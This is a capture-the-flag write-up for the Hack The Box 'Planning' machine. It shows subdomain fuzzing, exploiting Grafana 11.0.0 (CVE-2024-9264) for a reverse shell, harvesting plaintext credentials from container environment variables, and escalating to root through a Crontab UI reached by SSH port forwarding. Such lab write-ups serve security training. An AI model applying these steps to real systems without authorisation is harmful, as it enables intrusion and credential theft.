Planning

Machine information:

As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r

Nmap results:

└──╼ #nmap -sV -Pn planning.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-30 06:13 CDT
Nmap scan report for planning.htb (10.10.11.68)
Host is up (0.0095s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds

I tried Directory/Path fuzzing first with ffuf with no results. Switched to some subdomain fuzzing and got a hit for grafana!

┌─[root@htb-xscrudoxxj]─[/usr/share/seclists/Discovery/DNS]
└──╼ #ffuf -w bitquark-subdomains-top100000.txt -H "Host: FUZZ.planning.htb" -u http://planning.htb -fs 178

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://planning.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.planning.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 178
________________________________________________

grafana                 [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 8ms]
:: Progress: [100000/100000] :: Job [1/1] :: 5882 req/sec :: Duration: [0:00:20] :: Errors: 0 ::

The credentials you got in the beginning works here so you can log in as admin.

The version is Grafana v11.0.0 and I found this GitHub repository regarding a vulnerability in Grafana v11.0.0. Using this script gives us a reverse shell.

After looking around for a while I checked the environment variables and found this. Looks like a containerized environment. But there's credentials we could try SSH'ing with to escape the container.

# env
GF_PATHS_HOME=/usr/share/grafana
HOSTNAME=7ce659d667d7
AWS_AUTH_EXTERNAL_ID=
SHLVL=1
HOME=/usr/share/grafana
OLDPWD=/proc
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_LOGS=/var/log/grafana
_=env
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
AWS_AUTH_SESSION_DURATION=15m
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
PWD=/proc/1

We have a user and password which we can log in with.

┌─[eu-vip-1]─[10.10.14.11]─[adapet@htb-xscrudoxxj]─[~/CVE-2024-9264-RCE-Exploit]
└──╼ [★]$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-59-generic x86_64)

Last login: Fri May 30 13:46:03 2025 from 10.10.14.11
enzo@planning:~$ ls
linpeas.sh  root.txt  user.txt
enzo@planning:~$ cat user.txt
<USER FLAG>

I actually found the root flag in '/tmp/root.txt' but I'm guessing this is a misconfiguration since there is a root.txt in /home/enzo which only root can read.

I downloaded linpeas to the VM and ran it.

I looked at these files and in /opt/crontabs/crontab.db there were root credentials. These didn't work for SSH'ing though so it's credentials for something else.

Linpeas also showed that were listening on a few ports that might be worth checking out:

Let's set up SSH Local Port Forwarding

ssh -L 8000:127.0.0.1:8000 [email protected]

We can then browse to 127.0.0.1:8000 and enter the credentials. We're presented with a Crontab UI.

From here we can create a cronjob that 'cats' the root flag into a new file which we can read. I'm guessing the flag I found first was a remnant of someone else who did this.

PreviousChemistry NextPuppy

Last updated 7 months ago